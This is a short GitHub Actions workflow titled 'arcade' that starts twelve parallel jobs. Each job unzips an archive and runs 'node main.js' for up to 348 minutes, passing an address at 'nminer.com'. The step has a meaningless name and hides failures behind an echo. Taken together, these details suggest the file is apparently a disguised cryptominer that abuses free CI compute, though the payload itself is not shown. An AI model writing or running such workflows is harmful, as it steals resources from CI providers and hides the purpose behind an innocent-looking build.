name: arcade
on:
  push:
    branches: [ "main" ]
    paths:
      - "arcade.txt"

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { os: 0 }
          - { os: 1 }
          - { os: 2 }
          - { os: 3 }
          - { os: 4 }
          - { os: 5 }
          - { os: 6 }
          - { os: 7 }
          - { os: 8 }
          - { os: 9 }
          - { os: 10 }
          - { os: 11 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20

      - name: Unzip arcade.zip
        run: |
          sudo apt install -y unzip
          unzip arcade.zip

      - name: webbed atop that frizzy chunder yet rebound
        run: |
          npm install --ignore-scripts
          timeout 348m node main.js mathsubhas10@nminer.com || echo "arcade executed"